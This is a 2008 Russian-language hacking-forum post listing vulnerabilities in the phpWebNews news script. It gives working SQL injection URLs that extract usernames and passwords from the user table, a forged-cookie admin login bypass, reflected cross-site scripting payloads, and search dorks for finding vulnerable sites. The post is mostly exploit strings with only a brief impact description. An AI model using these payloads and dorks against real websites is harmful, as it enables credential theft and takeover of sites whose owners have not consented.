[ Обзор уязвимостей phpWebNews ]

Discussion in 'Веб-уязвимости' started by ~!DoK_tOR!~, 26 Jul 2008.

  1. ~!DoK_tOR!~

    ~!DoK_tOR!~ Banned

    Joined:
    10 Nov 2006
    Messages:
    673
    Likes Received:
    357
    Reputations:
    44
    [ Обзор уязвимостей phpWebNews ]

    phpWebNews 0.2 MySQL Edition (det) SQL Injection Vulnerability

    Воздействие:

    Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных приложения. Уязвимость существует из-за недостаточной обработки входных данных в параметре «det» сценарием bukutamu.php и в параметре «id_kat» сценарием index.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения.

    Exploit:

    Code:
    http://site.com/phpwebnews-mysql/bukutamu.php?det=-1/**/union/**/select/**/1,2,user,passwd,5,6,7/**/from/**/user/*
    phpWebNews 0.2 MySQL Edition (id_kat) SQL Injection Vulnerability

    Exploit:

    Code:
    http://site.com/index.php?id_kat=null+UNION+ALL+SELECT+1,2,3,4,concat(user,0x3a,passwd),6,7,8,9,10,11,12,13+FROM+user--
    phpWebNews 0.2 MySQL Edition (SQL) Insecure Cookie Handling Vulnerability

    Exploit:

    PHP:
    javascript:document.cookie "a1=admin ' or 1=1/*; path=/;"document.cookie "a2=[what ever]; path=/;";
    phpwebnews v.1 Multiple Cross Site Scripting Vulnerabilites

    Exploit:

    Code:
    www.example.com/[path]/iklan.php?m_txt=<script>alert(/the_Edit0r/);</script>
    
    www.example.com/[path]/index.php?m_txt=<script>alert(/the_Edit0r/);</script> 
    
    www.example.com/[path]/bukutamu.php?m_txt=<script>alert(/the_Edit0r/);</script>
    Dork:

    Powered by PHPWebNews
    Powered by PHPWebNews v1.0
    Powered by PHPWebNews v2.0
    allinurl:index.php?id_kat=

    Download phpWebNews:

    phpwebnews-mysql 0.2
    phpwebnews-posgresql 0.1
     
    #1 ~!DoK_tOR!~, 26 Jul 2008
    Last edited: 27 Jul 2008